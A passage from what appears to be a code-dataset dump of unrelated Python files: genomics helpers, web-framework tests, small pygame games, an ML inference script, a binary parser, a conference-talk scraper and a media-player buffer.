return (sorted(self.dtid2startcodon_pos[tid],key=lambda x: x[1], reverse=False))
def get_stopcodon (self, tid):
return self.dtid2stopcodon[tid]
def get_tids_from_gid (self, gid):
if gid in self.dgid2tid:
return (self.dgid2tid[gid])
if gid in self.dtid2gid:
return [gid]
return []
def get_tids_from_start (self, chrom, start):
start = int(start)
if (chrom, start) in self.dchromstart2tid:
return [s for s in self.dchromstart2tid[(chrom, start)].split(",") if s != ""]
else:
return []
def get_tids_from_end (self, chrom, end):
end = int(end)
if (chrom, end) in self.dchromend2tid:
return [s for s in self.dchromend2tid[(chrom, end)].split(",") if s != ""]
else:
return []
def get_all_tids (self):
#for tid in self.dtid2pos:
#for tid in self.dtid2gid:
# if tid != None:
# yield (tid)
return [tid for tid in self.dtid2gid if tid != None]
def get_all_gids (self):
return [gid for gid in self.dgid2name if gid != None]
# for gid in self.dgid2name:
# if gid != None:
# yield (gid)
def get_exon_coords (self, tid):
return (sorted(self.dtid2coord[tid],key=lambda x: x[1], reverse=False))
def get_chrom (self, tid):
return ("|".join (list(set([c for (c,s,e,t) in self.dtid2coord[tid]]))))
def get_strand (self, tid):
return ("|".join (list(set([t for (c,s,e,t) in self.dtid2coord[tid]]))))
def get_nexons (self, tid):
return (len (self.get_exon_coords (tid)))
def get_exons (self, tid):
sorted_exons = self.get_exon_coords (tid)
return ([s for (c,s,e,t) in sorted_exons], [e for (c,s,e,t) in sorted_exons])
def get_introns (self, tid):
exons_s, exons_e = self.get_exons (tid)
return (exons_e[:-1], exons_s[1:])
def get_start (self, tid):
sorted_exons = self.get_exon_coords (tid)
return (min ([s for (c,s,e,t) in sorted_exons]))
def get_end (self, tid):
sorted_exons = self.get_exon_coords (tid)
return (max ([e for (c,s,e,t) in sorted_exons]))
def print (self, tid, feature):
self.fetch (tid, feature).print_feature (feature)
| StarcoderdataPython |
3205589 | import json
import pytest
import six
from mock import Mock, patch
from nefertari import json_httpexceptions as jsonex
from nefertari.renderers import _JSONEncoder
class TestJSONHTTPExceptionsModule(object):
def test_includeme(self):
config = Mock()
jsonex.includeme(config)
config.add_view.assert_called_once_with(
view=jsonex.httperrors,
context=jsonex.http_exc.HTTPError)
@patch.object(jsonex, 'traceback')
def test_add_stack(self, mock_trace):
mock_trace.format_stack.return_value = ['foo', 'bar']
assert jsonex.add_stack() == 'foobar'
def test_create_json_response(self):
request = Mock(
url='http://example.com',
client_addr='127.0.0.1',
remote_addr='127.0.0.2')
obj = Mock(
status_int=401,
location='http://example.com/api')
obj2 = jsonex.create_json_response(
obj, request, encoder=_JSONEncoder,
status_code=402, explanation='success',
message='foo', title='bar')
assert obj2.content_type == 'application/json'
assert isinstance(obj2.body, six.binary_type)
body = json.loads(obj2.body.decode('utf-8'))
assert sorted(body.keys()) == [
'_pk', 'client_addr', 'explanation', 'message', 'remote_addr',
'request_url', 'status_code', 'timestamp', 'title'
]
assert body['remote_addr'] == '127.0.0.2'
assert body['client_addr'] == '127.0.0.1'
assert body['status_code'] == 402
assert body['explanation'] == 'success'
assert body['title'] == 'bar'
assert body['message'] == 'foo'
assert body['_pk'] == 'api'
assert body['request_url'] == 'http://example.com'
@patch.object(jsonex, 'add_stack')
def test_create_json_response_obj_properties(self, mock_stack):
mock_stack.return_value = 'foo'
obj = Mock(
status_int=401,
location='http://example.com/api',
status_code=402, explanation='success',
message='foo', title='bar')
obj2 = jsonex.create_json_response(
obj, None, encoder=_JSONEncoder)
body = json.loads(obj2.body.decode('utf-8'))
assert body['status_code'] == 402
assert body['explanation'] == 'success'
assert body['title'] == 'bar'
assert body['message'] == 'foo'
assert body['_pk'] == 'api'
@patch.object(jsonex, 'add_stack')
def test_create_json_response_stack_calls(self, mock_stack):
mock_stack.return_value = 'foo'
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(obj, None, encoder=_JSONEncoder)
assert mock_stack.call_count == 0
obj = Mock(status_int=500, location='http://example.com/api')
jsonex.create_json_response(obj, None, encoder=_JSONEncoder)
mock_stack.assert_called_with()
assert mock_stack.call_count == 1
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(
obj, None, encoder=_JSONEncoder, show_stack=True)
mock_stack.assert_called_with()
assert mock_stack.call_count == 2
obj = Mock(status_int=401, location='http://example.com/api')
jsonex.create_json_response(
obj, None, encoder=_JSONEncoder, log_it=True)
mock_stack.assert_called_with()
assert mock_stack.call_count == 3
def test_create_json_response_with_body(self):
obj = Mock(
status_int=401,
location='http://example.com/api')
obj2 = jsonex.create_json_response(
obj, None, encoder=_JSONEncoder,
status_code=402, explanation='success',
message='foo', title='bar', body={'zoo': 'zoo'})
assert obj2.content_type == 'application/json'
assert isinstance(obj2.body, six.binary_type)
body = json.loads(obj2.body.decode('utf-8'))
assert body == {'zoo': 'zoo'}
def test_exception_response(self):
jsonex.STATUS_MAP[12345] = lambda x: x + 3
assert jsonex.exception_response(12345, x=1) == 4
with pytest.raises(KeyError):
jsonex.exception_response(3123123123123123)
jsonex.STATUS_MAP.pop(12345, None)
def test_status_map(self):
codes = [
200, 201, 202, 203, 204, 205, 206,
300, 301, 302, 303, 304, 305, 307,
400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410,
411, 412, 413, 414, 415, 416, 417, 422, 423, 424,
500, 501, 502, 503, 504, 505, 507
]
for code in codes:
assert code in jsonex.STATUS_MAP
for code_exc in jsonex.STATUS_MAP.values():
assert hasattr(jsonex, code_exc.__name__)
@patch.object(jsonex, 'create_json_response')
def test_httperrors(self, mock_create):
jsonex.httperrors({'foo': 'bar'}, 1)
mock_create.assert_called_once_with({'foo': 'bar'}, request=1)
@patch.object(jsonex, 'create_json_response')
def test_jhttpcreated(self, mock_create):
resp = jsonex.JHTTPCreated(
resource={'foo': 'bar'},
location='http://example.com/1',
encoder=1)
mock_create.assert_called_once_with(
obj=resp, resource={'foo': 'bar', '_self': 'http://example.com/1'},
request=None, encoder=1, body=None)
| StarcoderdataPython |
184995 | <gh_stars>0
# -*- coding: utf-8 -*-
from os import path
import sys
import math
project_dir = path.dirname(__file__)
project_dir = path.join('..')
sys.path.append(project_dir)
from atores import PassaroAmarelo, PassaroVermelho, Obstaculo, Porco
from fase import Fase
from placa_grafica_tkinter import rodar_fase
from random import randint
if __name__ == '__main__':
fase = Fase(intervalo_de_colisao=32)
# Adicionar Pássaros Amarelos
for i in range(4):
fase.adicionar_passaro(PassaroAmarelo(30, 30))
fase.adicionar_passaro(PassaroVermelho(30, 30))
# Obstaculos
_obstaculos = [(300,0),(400,40),(500,80),(600,120),(700,160)]
for posicao_obstaculo in _obstaculos:
x, y = posicao_obstaculo
fase.adicionar_obstaculo(Obstaculo(x, y))
# Porcos
_porcos = [(340,0),(440,0),(540,0),(640,0),(740,0)]
for posicao_porco in _porcos:
x, y = posicao_porco
fase.adicionar_porco(Porco(x, y))
rodar_fase(fase) | StarcoderdataPython |
1796558 | class config:
def get_database_conn_string(self) -> str:
pass
| StarcoderdataPython |
95481 | from mmdet.apis import init_detector, inference_detector, show_result
import time
import os
config_file = 'configs/htc/htc_x101_64x4d_fpn_20e_16gpu.py'
checkpoint_file = 'checkpoints/htc_x101_64x4d_fpn_20e_20190408-497f2561.pth'
folder_name = config_file.split('/')[2].split('.')[0]
print('FOLDER NAME ',folder_name)
if not os.path.exists(os.path.join(os.getcwd(), folder_name)):
os.mkdir(os.path.join(os.getcwd(), folder_name))
# build the model from a config file and a checkpoint file
# model = init_detector(config_file, checkpoint_file, device='cuda:0')
model = init_detector(config_file, checkpoint_file, device='cuda:0')
# test a single image and show the results
import cv2
import numpy as np
# Create a VideoCapture object and read from input file
cap = cv2.VideoCapture('video.mp4')
# Check if camera opened successfully pr
if (cap.isOpened()== False):
print("Error opening video file")
# Read until video is completed
count =0
start = time.time()
while(cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
if ret == True:
# img = 'test.jpg' # or img = mmcv.imread(img), which will only load it once
result = inference_detector(model, frame)
show_result(frame, result, model.CLASSES, out_file='benchmarks/{}/result{}.jpg'.format(folder_name ,count))
count+=1
print('Count ',count, 'Time ',time.time() - start)
end = time.time() - start
cap.release()
cv2.destroyAllWindows()
print('_______', end)
# test a list of images and write the results to image files
# imgs = ['test1.jpg', 'test2.jpg']
# for i, result in enumerate(inference_detector(model, imgs)):
# show_result(imgs[i], result, model.CLASSES, out_file='result_{}.jpg'.format(i)) | StarcoderdataPython |
151611 | <reponame>zephenryus/botw-havok
import struct
from typing import BinaryIO
from .SectionHeader import SectionHeader
from .DataSectionOffsetTable import DataSectionOffsetTable
from .ClassNames import ClassNames
class Data(object):
def __init__(self,
infile: BinaryIO,
data_section_header: SectionHeader,
data_section_offset_table: DataSectionOffsetTable,
classnames
) -> None:
self.data = []
self.data_section_offset_table = self._get_array_sizes(infile, data_section_offset_table, data_section_header.start)
self._get_data(infile, data_section_header.start)
def __getitem__(self, item):
return self.data[item]
def _get_array_sizes(self, infile: BinaryIO,
data_section_offset_table: DataSectionOffsetTable,
section_start: int
) -> DataSectionOffsetTable:
for offset in data_section_offset_table:
infile.seek(offset.meta + section_start)
array_length, array_length_check = struct.unpack('>4x2I4x', infile.read(16))
if array_length_check == array_length + 0x80000000:
offset.array_length = array_length
else:
offset.array_length = 0
return data_section_offset_table
def _get_data(self, infile: BinaryIO, section_start: int):
for offset in self.data_section_offset_table:
infile.seek(offset.data + section_start)
self.data.append(struct.unpack('>I', infile.read(4))[0])
| StarcoderdataPython |
100294 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# TODO: add search phrases
#
import urllib
from bs4 import BeautifulSoup
from collections import Counter
import os
import re
maxAnalysisCount = 150
maxOutputCount = 100
outFileName = "CraftConfWordFreqTrend.csv"
commonWordsFileName = "CommonWords.csv"
def readList(input, separator=''):
retList = list()
with open(input, 'rb') as inputFile:
for line in inputFile:
outline = line.strip()
if outline != "" and not outline.startswith("#"):
if separator == '':
retList.append(outline)
else:
for item in outline.split(separator):
item = item.strip()
if item != "":
retList.append(item)
return retList
def writeHeader(outFileName):
try:
os.remove(outFileName)
except OSError:
pass
with open(outFileName, "a") as outfile:
outfile.write("{0}, {1}, {2}\n".format("Year", "Keyword", "Frequency"))
def parsePage(url, outFileName, prefix):
print "Processing URL: {0}, Result: {1}, Prefix: {2}".format(url, outFileName, prefix)
opener = urllib.urlopen(url)
page = opener.read()
opener.close()
soup = BeautifulSoup(page, "html.parser", from_encoding="UTF-8")
content = soup.find_all("li", "speakers-item")
text = ""
for entry in content:
text += entry.get_text(" ", True)
words = [word.lower() for word in text.split()]
c = Counter(words)
for key in commonWords:
if key in c:
del c[key]
mostCommon = list()
for word, count in c.most_common(maxAnalysisCount):
if not re.search('[–{@#!;+=_,$<(^)>?.:%/&}''"''-]', word):
if not (re.search(u'\u2014', word) or re.search(u'\u2013', word)):
if not re.search('[0-9]', word):
if word:
mostCommon.append((word, count))
else:
print("Skipping: <empty>")
else:
print("Skipping number: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping unicode character: {0}".decode('ascii', 'ignore').format(word))
else:
print("Skipping special character: {0}".decode('ascii', 'ignore').format(word))
with open(outFileName, "a") as outfile:
for word, count in mostCommon[:maxOutputCount]:
outfile.write("{0}, {1}, {2}\n".format(prefix, word, count))
print "Done"
# main
commonWords = readList(commonWordsFileName, ',')
writeHeader(outFileName)
parsePage("https://web.archive.org/web/20160325231108/http://craft-conf.com/2016", outFileName, "year2016")
parsePage("https://web.archive.org/web/20160406212403/http://craft-conf.com/2015", outFileName, "year2015")
parsePage("https://web.archive.org/web/20160324192950/http://craft-conf.com/2014", outFileName, "year2014")
| StarcoderdataPython |
141424 | <reponame>kashy750/RecoSystem
#!/usr/bin/env python
from py_recommendation.constants import STOPWORDS
from re import sub
class Utils(object):
"""Helper class for main api classes"""
@staticmethod
def cleanText(text_list):
return [" ".join(sub(r"(?!(?<=\d)\.(?=\d))[^a-zA-Z0-9 ]"," ",each).lower().split()) for each in text_list]
| StarcoderdataPython |
38066 | a=int(input())
b=int(input())
print (a/b)
a=float(a)
b=float(b)
print (a/b) | StarcoderdataPython |
36590 | from datetime import datetime, timedelta
import pytest
from django.test import TestCase
from tests.models import Org, Sub, Widget
data_org = {"name": "Acme Widgets"}
class FieldTestCase(TestCase):
def setUp(self):
self.org = Org.objects.create(**data_org)
self.created = datetime.now()
self.one_sec = timedelta(seconds=1)
pass
# org = Org.objects.create(**data_org)
def test_obj_creation(self):
assert self.one_sec > self.created - self.org.created
assert self.one_sec > self.created - self.org.updated
def test_updated(self):
self.org.name = "Updated"
self.org.save()
now = datetime.now()
assert self.one_sec > self.created - self.org.created
assert self.one_sec > now - self.org.updated
| StarcoderdataPython |
147301 | import argparse
import glob
import os
import pickle
import sys
import time
from itertools import product
import matplotlib.pyplot as plt
import multiprocessing as mp
import numpy as np
import pandas as pd
import seaborn as sns
import statsmodels.nonparametric.api as smnp
import swifter
import utils
import graphs
N_PROC = 10
BASE_DIR = '/home/johnmcbride/projects/Scales/Data_compare/'
RAW_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Raw/'
PRO_DIR = '/home/johnmcbride/projects/Scales/Toy_model/Data/Processed/'
REAL_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Samples')
DIST_DIR = os.path.join(BASE_DIR, 'Processed/Real', 'Sample_dist')
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
pass
else:
RE += pk[i] * np.log(pk[i] / qk[i])
return RE
def calc_jensen_shannon_distance(pk, qk):
mk = 0.5 * (pk + qk)
return (0.5 * (calc_relative_entropy(pk, mk) + calc_relative_entropy(qk, mk))) ** 0.5
def smooth_dist_kde(df, cat='pair_ints', hist=False, nbins=1202):
X = [float(x) for y in df.loc[:,cat] for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit(kernel='gau', bw='scott', fft=1, gridsize=10000, cut=20)
grid = np.linspace(0, 1200, num=nbins-1)
y = np.array([kde.evaluate(x) for x in grid]).reshape(nbins-1)
if hist:
xtra = (nbins-2)/1200./2.
bins = np.linspace(-xtra, 1200+xtra, num=nbins)
hist, bins = np.histogram(X, bins=bins, normed=True)
return grid, y, hist
else:
return grid, y
def get_KDE(df, cat):
xKDE, yKDE = smooth_dist_kde(df, cat=cat)
return yKDE / np.trapz(yKDE)
def get_dists_file(s, cat='pair_ints', nbins=1202):
out = {}
if not os.path.exists(os.path.join(DIST_DIR, f"{s}_n7_hist.npy")):
df = pd.read_feather(os.path.join(REAL_DIR, f"{s}.feather"))
for n in [5,7]:
fHist = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_hist.npy")
fKDE = os.path.join(DIST_DIR, f"{s}_{cat}_n{n}_kde.npy")
if os.path.exists(fHist):
X, hist = np.load(fHist)
X, kde = np.load(fKDE)
else:
X, kde, hist = smooth_dist_kde(df.loc[df.n_notes==n], cat=cat, hist=True, nbins=nbins)
np.save(fHist, np.array([X, hist]))
np.save(fKDE, np.array([X, kde]))
out[n] = [X, kde, hist]
return out
def how_much_real_scales_predicted(df, n_real, w, s):
# try:
return float(len(set([int(x) for y in df[f"{s}_w{w:02d}"] for x in y.split(';') if len(y)]))) / float(n_real)
# except:
# return None
def rename_processed_files(f, s='sample_'):
root, fName = os.path.split(f)
print(root, fName)
return os.path.join(root, f"{s}{fName}")
def load_model_filenames():
paths = pickle.load(open(os.path.join(BASE_DIR, 'best_models.pickle'), 'rb'))
return [rename_processed_files(paths[k][n]) for k, n in product(paths.keys(), [5,7])]
def calculate_metrics(y1, y2):
y1 = y1.reshape(y1.size)
y2 = y2.reshape(y2.size)
err_sq = np.sqrt(np.dot(y1-y2, y1-y2))
d1 = y1[1:] - y1[:-1]
d2 = y2[1:] - y2[:-1]
deriv_es = np.sqrt(np.dot(d1-d2, d1-d2))
return [err_sq, deriv_es, (err_sq * deriv_es)**0.5]
def scale_rsq(Y1, Y2):
SStot = np.sum((Y1 - np.mean(Y1))**2)
SSres = np.sum((Y1 - Y2)**2)
return 1 - SSres/SStot
if __name__ == "__main__":
timeS = time.time()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--partabase', action='store', default='None', type=str)
args = parser.parse_args()
categories = ['pair_ints', 'scale']
n_arr = np.arange(4,10,dtype=int)
samples = ['theory', 'instrument'] + [f"sample_f{frac:3.1f}_{i:02d}" for frac in [0.4, 0.6, 0.8] for i in range(10)]
files = [f"{s}.feather" for s in samples]
int_dists = [get_dists_file(s) for s in samples]
hist_dists = [get_dists_file(s, cat='scale', nbins=42) for s in samples]
# print(f"Real scales loaded after {(time.time()-timeS)/60.} minutes")
pro_files = load_model_filenames()
def extract_stats_each_model(fName):
df = pd.read_feather(fName)
bits = os.path.split(fName)[1].split('_')
n = int(bits[1].strip('n'))
idx = [i for i in range(len(bits)) if bits[i][0]=='M'][0]
bias = '_'.join(bits[2:idx])
mi = int(bits[idx].strip('MI'))
ma = int(bits[idx+1].strip('MA'))
beta = float(bits[-1].strip('.feather'))
n_sample = df.n_att.sum()
q = float(len(df))/float(n_sample)
output = [n, mi, ma, bias, beta, q, n_sample]
X, iKDE, iHist = smooth_dist_kde(df, cat='pair_ints', hist=True)
X, sKDE, sHist = smooth_dist_kde(df, cat='scale', hist=True, nbins=42)
for i, f in enumerate(files):
df_real = pd.read_feather(os.path.join(REAL_DIR, f))
n_real = len(df_real.loc[df_real.n_notes==n])
frac_real = [how_much_real_scales_predicted(df, n_real, w, f'{samples[i]}_ss') for w in [10, 20]]
metrics = calculate_metrics(int_dists[i][n][1], iKDE)
scale_R2 = scale_rsq(sHist,hist_dists[i][n][2])
output.extend([n_real] + frac_real + metrics + [scale_R2])
return output + [fName]
biases = ['none',
'distI_1_0', 'distI_2_0', 'distI_3_0', 'distI_0_1', 'distI_0_2',
'distI_1_1', 'distI_2_1', 'distI_1_2', 'distI_2_2',
'opt_c', 'opt_c_I1', 'opt_c_I2', 'opt_c_s2', 'opt_c_s3'] + \
[f"hs_n{i}_w{w:02d}" for i in range(1,4) for w in [5,10,15,20]] + \
[f"hs_r3_w{w:02d}" for w in [5,10,15,20]] + \
[f"ahs{i:02d}_w{w:02d}" for i in range(1,11) for w in [5,10,15,20]] + \
[f"im5_r{r:3.1f}_w{w:02d}" for r in [0, 0.5, 1, 2] for w in [5,10,15,20]] + \
[f"Nhs_n1_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n2_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nhs_n3_w{w:02d}" for w in [5,10,15,20]] + \
[f"Nim5_r0.0_w{w:02d}" for w in [5,10,15,20]] + \
[f"TRANSB_{i}" for i in [1,2,3]] + \
[f"TRANS{a}_{b}" for a in ['A', 'B'] for b in range(1,4)] + \
[f"HAR_{b}_{a}" for a in range(1,4) for b in range(5,25,5)] + \
[f"{a}_{b}" for a in ['HAR', 'FIF'] for b in range(5,25,5)]
# ['hs_r3_w05', 'hs_r3_w10', 'hs_r3_w15', 'hs_r3_w20'] + \
# [f"im5_r0.75_w{w:02d}" for w in [5,10,15,20] +
groups = ['none'] + ['distI']*3 + ['S#1']*2 + ['distI_S#1']*4 + \
['distW'] + ['distW_S#1']*2 + ['distW_S#2']*2 + ['HS']*12 + ['im5']*4 + ['AHS']*40 + ['im5']*16 + \
['HS']*12 + ['im5']*4 + ['TRANSB']*3 + \
['TRANS']*6 + ['HAR']*4 + ['HAR2']*4 + ['HAR3']*4 + ['HAR']*4 + ['FIF']*4
bias_groups = {biases[i]:groups[i] for i in range(len(biases))}
with mp.Pool(N_PROC) as pool:
results = list(pool.imap_unordered(extract_stats_each_model, pro_files))
print(f"Model comparison finished after {(time.time()-timeS)/60.} minutes")
df = pd.DataFrame(columns=['n_notes', 'min_int', 'max_int', 'bias', 'beta', 'quantile', 'n_sample'] + \
[f"{s}_{a}" for s in samples for a in ['n_real', 'fr_10', 'fr_20', 'RMSD', 'dRMSD', 'met1', 'sRMSD']] + \
['fName'], data=results)
df['bias_group'] = df.bias.apply(lambda x: bias_groups[x])
df['logq'] = np.log10(df['quantile'])
df = graphs.rename_bias_groups(df)
df = graphs.rename_biases(df)
print(f"DataFrame compiled after {(time.time()-timeS)/60.} minutes")
if args.partabase == 'None':
df.to_feather(os.path.join(BASE_DIR, 'Processed', 'database_sensitivity.feather'))
| StarcoderdataPython |
3282613 | import torch
import torch.nn as nn
from graphs.losses.softmax import LossFunction as Softmax
from graphs.losses.angleproto import LossFunction as Angleproto
class LossFunction(nn.Module):
def __init__(self, **kwargs):
super(LossFunction, self).__init__()
self.test_normalize = True
self.softmax = Softmax(**kwargs)
self.angleproto = Angleproto(**kwargs)
def forward(self, x, label=None):
assert x.size()[1] == 2
nlossS, prec1 = self.softmax(x.reshape(-1,x.size()[-1]), label.repeat_interleave(2))
nlossP, _ = self.angleproto(x,None)
return nlossS+nlossP, prec1
| StarcoderdataPython |
3380340 | <gh_stars>10-100
"""Transform data by filtering in data using filtering operations
Author(s):
<NAME> (<EMAIL>)
<NAME> (<EMAIL>)
"""
import operator
import logging
import numpy as np
import pandas as pd
from primrose.base.transformer import AbstractTransformer
class FilterByPandasExpression(AbstractTransformer):
"""Applies filters to data as defined in feature_filters"""
def __init__(self, feature_filters):
"""initialize filter with a list of feature_filters"""
self.feature_filters = feature_filters
def fit(self, data):
"""fit data, here just passing
Args:
data (object): some data
"""
pass
def transform(self, data):
"""Applies filters to data as defined in feature_filters. This is neccessary so we can filter rows in one reader
based on information from another, and therefore has to be applied after the combiner step.
The filters can operate on a single column with a fixed set of operations and a static value:
fixed operations: `==`, `!=`, `<>`, `<`, `<=`, `>`, `>=`
The feature_filters object should be structured as a list of lists:
feature_filters: `[[column, operation, static value], [column, operation, static value]]`
example: `[["number_of_members", "<", 1000]]` for filtering all rows with number_of_members less than 1000
Args:
data (dict): dictionary with dataframes from all readers
data_key (str): key to pull the dataframe from within the data object
feature_filters (list): list of lists with columns and operators to filter on
instance_name (str): name of this pipeline instance
Returns:
dataframe with filtered data
Raises:
Exception if not a pandas dataframe, operation not supported, or column name not recognized
"""
if not isinstance(data, pd.DataFrame):
raise Exception("Data is not a pandas DataFrame")
ops = {
"==": operator.eq,
"!=": operator.ne,
"<>": operator.ne,
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
}
if len(self.feature_filters) == 0:
logging.info("no filters found; returning combined_data as filtered_data")
return data
else:
filters = []
for col, op, val in self.feature_filters:
if not col in data.columns:
raise Exception("Unrecognized filter column '" + str(col) + "'")
if str(op) not in ops:
raise Exception("Unsupported filter operation '" + str(op) + "'")
filters.append(ops[op](data[col], val))
filtered_data = data[np.all(filters, axis=0)]
filtered_data = filtered_data.reset_index(drop=True)
logging.info("Filtered out %d rows" % (len(data) - len(filtered_data)))
return filtered_data
| StarcoderdataPython |
1783614 | from UserString import MutableString
import pygame
import sys
import time
pygame.init()
WHITE = (48, 48, 48)
manx = 0
many = 0
pixelx = 60
pixely = 60
tilex = 10
tiley = 8
displayx = pixelx * tilex
displayy = pixely * tiley
iotcount = 0
DISPLAYSURF = None
iotwall = pygame.image.load('iot_wall.png')
iotmanU = pygame.image.load('iot_manU.png')
iotmanD = pygame.image.load('iot_manD.png')
iotmanL = pygame.image.load('iot_manL.png')
iotmanR = pygame.image.load('iot_manR.png')
iotobj1 = pygame.image.load('iot_obj1.png')
iotobj2 = pygame.image.load('iot_obj2.png')
clear = pygame.image.load('iot_clear.png')
iotman = iotmanL
stagenum = 0
iotmap = []
iotstage = [
[
MutableString(" "),
MutableString(" ### "),
MutableString(" ###2## "),
MutableString(" #211 ### "),
MutableString(" ###@112# "),
MutableString(" ##2### "),
MutableString(" ### "),
MutableString(" ")],
[
MutableString(" ### "),
MutableString(" #2# "),
MutableString(" # #### "),
MutableString(" ###1 12# "),
MutableString(" #2 1@### "),
MutableString(" ####1# "),
MutableString(" #2# "),
MutableString(" ### ")],
[
MutableString("##########"),
MutableString("#2# 122#"),
MutableString("#21 ###1##"),
MutableString("#1# #"),
MutableString("# @ #1#"),
MutableString("##1### 12#"),
MutableString("#221 #2#"),
MutableString("##########")
]
]
def iotloadmap():
global iotmap
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
def iotsetcaption(caption):
pygame.display.set_caption(caption)
def iotdraw():
global manx
global many
global stageend
DISPLAYSURF.fill(WHITE)
stageend = True
for ix in range(tilex):
for iy in range(tiley):
if '#' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotwall, (ix * pixelx, iy * pixely))
elif '@' == iotmap [iy][ix]:
manx = ix
many = iy
DISPLAYSURF.blit(iotman, (ix * pixelx, iy * pixely))
elif '1' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotobj1, (ix * pixelx, iy * pixely))
if '2' != iotstage[stagenum][iy][ix]:
stageend = False
elif '2' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotobj2, (ix * pixelx, iy * pixely))
pygame.init()
iotsetcaption("Sokoban")
DISPLAYSURF = pygame.display.set_mode((displayx, displayy), 0, 32)
iotloadmap()
while True:
iotdraw()
pygame.display.update()
if True == stageend:
DISPLAYSURF.blit(clear, (120, 60))
pygame.display.update()
keyinput = False
while True:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
keyinput = True
break
if True == keyinput:
break
time.sleep(0.1)
continue
stagenum = stagenum + 1
iotmap = []
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
iotcount = 0
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
continue
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
tempx = manx
tempy = many
if event.key == pygame.K_UP:
iotman = iotmanU
many = many-1
elif event.key == pygame.K_DOWN:
iotman = iotmanD
many = many+1
elif event.key == pygame.K_LEFT:
iotman = iotmanL
manx = manx-1
elif event.key == pygame.K_RIGHT:
iotman = iotmanR
manx = manx+1
elif event.key == pygame.K_r:
iotcount = 0
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
iotmap = []
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
break
else:
continue
if '#' != iotmap[many][manx]:
if '1' == iotmap[many][manx]:
if ' ' == iotmap[2 * many - tempy][2 * manx - tempx]:
iotmap[2 * many - tempy][2 * manx - tempx] = '1'
elif '2' == iotmap[2 * many - tempy][2 * manx - tempx]:
iotmap[2 * many - tempy][2 * manx - tempx] = '1'
else:
manx = tempx
many = tempy
continue
if '2' == iotstage[stagenum][tempy][tempx]:
iotmap[tempy][tempx] = '2'
else:
iotmap[tempy][tempx] = ' '
iotmap[many][manx] = '@'
iotcount = iotcount + 1
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
else:
manx = tempx
many = tempy
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit() | StarcoderdataPython |
1785995 | import numpy as np
import click
import time
import pygame
import pygame.locals as pyloc
import librosa as lr
import ffmpeg
import logging
import re
import pyaudio
import subprocess
import json
import os
import signal
import pdb
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
playlog = log.getChild('playback')
class PlayArgs:
def __init__(self, mouse_pos, position_offset, window_size, speed,
normal_speed, pause, set_bookmark, goto_bookmark, exit):
self.goto_bookmark = goto_bookmark
self.set_bookmark = set_bookmark
self.normal_speed = normal_speed
self.window_size = window_size
self.speed = speed
self.exit = exit
self.pause = pause
self.mouse_pos = mouse_pos
self.position_offset = position_offset
def got_command(self):
return self.pause or self.mouse_pos or self.position_offset or \
self.exit or self.speed or self.window_size or \
self.normal_speed or self.set_bookmark or self.goto_bookmark
# TODO log what the mimimum and maximum time that could be required before
# the silence cutter can kick in based on the BLOCK_LENGTH speed etc.
# TODO put video playback into seperate process to reduce lag
# TODO if a command is issued always draw the stats surface for the specified
# ammount of time
# Fixme if the playbackspeed is less that one, after some time a buffer
# underflow exception is raised
# TODO create fadein fadeout effect for stats bar
# TODO make it so that you can see the playbar always without resizing
# TODO make it so that you can only scrub through the timeline when you are on it
# TODO make it so that the sime of a point on the progressbar is displayed when
# you hover over the progressbar
# TODO enable selection of which audiotrack to play
# TODO Make it so that you can install via pip (the executable)
# (use setuptools? look at click documentation)
# TODO create tests for different file types
# FIXME when reaching the end of a .ts file that is currently being written
# the video resets to the positon of the play_from parameter play_from_pos
# was invoked with. This happens when the speed is 2 and the difference
# between video_positon and length_of_file is too close.
# TODO allow fractional speed
# TODO make it that it works for audiofiles
# TODO cerate command line documentation on controlls in window
# TODO add speed modifiers in timeline
# IFNEEDED create audio syncpoints. Prestart new audio and video streams
# (or only one of them) and then switch to them at a specific sync point
# (some point in time)
# IFNEEDED reimplement the simple unbuffered speedup procedures
# (because they run faster and do not lag)
# NICE you can stream youtube videos
# TODO Write tests for this buffer
class NumpyBuffer:
def __init__(self, size, dtype):
self.buffer = np.zeros(size, dtype=dtype)
self._buffer_len = size
self._write_idx = 0
self._read_idx = 0
self._fill_level = 0
@property
def fill_level(self):
return self._fill_level
@fill_level.setter
def fill_level(self, value):
if value > self._buffer_len:
raise Exception("Buffer overflow")
if value < 0:
raise Exception("Buffer underflow")
self._fill_level = value
def peek(self, n):
if n > self._buffer_len * 2:
raise Exception("Can't read more than twice the buffer size.")
rem = self._remaining_read_capacity()
if n <= rem:
return self.buffer[self._read_idx:n + self._read_idx]
else:
rem_n = n - rem
a = self.buffer[self._read_idx:]
b = self.buffer[:rem_n]
return np.concatenate((a, b))
def read(self, n):
r = self.peek(n)
self.advance_r(n)
return r
def write(self, arr):
if len(arr) > self._buffer_len * 2:
raise Exception("Can't write more than twice the buffer size.")
arr_len = len(arr)
if arr_len <= (self._buffer_len - self._write_idx):
